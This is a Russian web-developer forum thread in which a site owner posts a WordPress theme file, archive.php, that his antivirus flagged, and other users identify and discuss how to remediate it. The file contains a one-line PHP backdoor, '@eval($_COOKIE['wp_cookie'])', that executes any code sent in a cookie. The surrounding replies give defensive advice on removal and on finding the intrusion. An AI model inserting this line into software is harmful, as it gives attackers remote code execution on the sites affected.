Форум Сайтостроение Веб-строительство

Антивирус нашел странный файлик в шаблоне.

12345 6
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
1840

Здравствуйте, уважаемы. Делал бекапы, да и проверял что творится на хостингах и тут заметил что антивирус ругается на одном сайте на WP на такой файлик который находится в шаблоне archive.php

Вот содержимое файлика: 


<?php @eval($_COOKIE['wp_cookie']);



$latteParams['bodyClasses'] .= ' with-sidebar';

$latteParams['bodyId'] = 'normal-page';



$latteParams['customTypeName'] = EDITABLE_CT_NAME;



$latteParams['archive'] = new WpLatteArchiveEntity();



$latteParams['posts'] = WpLatte::createPostEntity($GLOBALS['wp_query']->posts);



WPLatte::createTemplate(basename(__FILE__, '.php'), $latteParams)->render();

Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже... Или удаление потянет за собой некорректную работу шаблона?:popcorn:

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
edogs software
На сайте с 15.12.2005
Offline
775
edogs software
#1

Maxim-KL,

Ругается он скорее всего на @eval($_COOKIE['wp_cookie']);

Удалить именно это безусловно надо и к проблемам с 99% вероятностью это не приведет.

Но если не найдете причину появления этого, то завтра оно снова появится.

Поэтому а) удаляйте б) ищите как оно туда попало

Перед первым пунктом, если это дозволительно, добавьте в запрещенные функции eval и остальные из этой подгруппы (исполнение произвольного кода).

Разработка крупных и средних проектов. Можно с криптой. Разумные цены. Хорошее качество. Адекватный подход. Продаем lenovo legion в спб, дешевле магазинов, новые, запечатанные. Есть разные. skype: edogssoft
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#2
Maxim-KL:
Делал бекапы, да и проверял что творится на хостингах

А в предыдущих версиях бэкапов такое же?. .

Maxim-KL:
файлик который находится в шаблоне archive.php

Достаточно наглядный пример.. и про бесплатные шаблоны из неизвестных источников, и про дырявость wp.. Счас ещё SeVlad придёт, подкинет.. ))

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#3
edogs:
а) удаляйте б) ищите как оно туда попало

Удалил, весь файл кажется все пока работает корректно.

Попало наверно еще давно с шалоном, но интересно это все или там еще стоит ожидать кучу неприятностей по файлом...

---------- Добавлено 29.04.2020 в 19:44 ----------

ivan-lev:
А в предыдущих версиях бэкапов такое же?. .

Да, как бы и нет старых бекапов, и шаблон конечно еще тот... уже и не помню откуда он на том сайте...

S
На сайте с 30.09.2016
Offline
469
Sitealert
#4
Maxim-KL:
Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже... Или удаление потянет за собой некорректную работу шаблона?🍿

Это дырища величиной в сайт. Во-первых, надо посмотреть исходники темы на предмет этого кода. Если там то же самое – значит, это закладка создателя темы, и таких закладок может быть много. Тему фтопку. Если в исходниках этого нет, то сайт взломан. Надо искать подобные шеллы по всему сайту, а также искать исходную дыру, через которую произошёл взлом.

Ни в коем случае не восстанавливать сайт из бэкапов без предварительного анализа сайта специалистом. По возможности закрыть сайт на "Технические работы".

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#5

Sitealert, Как раз пишу вам ТЗ по данному сайту)) Надо будет это добавить в него, справитесь? Когда можно высылать?))

S
На сайте с 30.09.2016
Offline
469
Sitealert
#6

Я-то справлюсь, только не надо было этот файл трогать. Надо было просто сайт закрыть.

Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#7
Sitealert:
Надо было просто сайт закрыть.

Так могу файл вернуть обратно. А сайт можно и не закрывать, там как бы нет особой ценности...

S
На сайте с 30.09.2016
Offline
469
Sitealert
#8
edogs:
добавьте в запрещенные функции eval

Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама... 🙄

Это не функция.

IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#9
Sitealert:
Это не функция.

А хто тогда? o_O

https://www.php.net/manual/en/function.eval.php

S
На сайте с 23.05.2004
Offline
316
Stek
#10
@eval($_COOKIE***91;'wp_cookie'***93;);

Прекрасный ход. Записываем в куки любую команду, заходим на страницу и пхп ее выполняет :) Типичный бэкдор.

Sitealert:
Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама...
Это не функция.

eval - это функция.

Это просто подпись.
12345 6

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий